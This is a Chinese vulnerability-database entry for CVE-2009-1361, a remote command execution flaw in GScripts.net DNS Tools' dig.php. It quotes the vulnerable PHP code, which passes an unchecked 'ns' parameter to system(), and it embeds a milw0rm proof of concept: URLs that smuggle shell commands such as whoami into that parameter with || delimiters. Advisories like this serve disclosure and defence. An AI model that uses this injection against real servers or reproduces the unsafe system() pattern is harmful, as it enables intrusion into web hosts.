https://www.exploit-db.com/exploits/8454
https://www.securityfocus.com/bid/34559
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-430
GScripts.net DNS Tools 'dig.php'远程代码执行漏洞






漏洞ID | 1117599 | 漏洞类型 | 输入验证 |
发布时间 | 2009-04-16 | 更新时间 | 2009-04-29 |
![]() |
CVE-2009-1361 | ![]() |
CNNVD-200904-430 |
漏洞平台 | PHP | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
GScripts.netDNSTools中的dig.php允许远程攻击者借助主机参数中的一个shell元字符,执行任意指令。
|漏洞EXP
############################################################################################
[+] DNS Tools (PHP Digger) Remote Command Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
############################################################################################
[+] Remote Command Execution
- Vulnerable code in dig.php
------------------------------------------
$ns = $_GET['ns'];
system ("dig @$ns $host $query_type");
------------------------------------------
We can execute commands via "ns" variable.Just use || before and after
the command.
PoC :
http://127.0.0.1/dig.php?ns=||COMMAND HERE||&host=mortal-team.net&query_type=NS&status=digging
Example :
http://127.0.0.1/dig.php?ns=||whoami||&host=mortal-team.net&query_type=NS&status=digging
############################################################################################
# milw0rm.com [2009-04-16]
|受影响的产品
GScripts.net DNS Tools 0
|参考资料
来源:SECUNIA
名称:34773
链接:http://secunia.com/advisories/34773
检索漏洞
开始时间
结束时间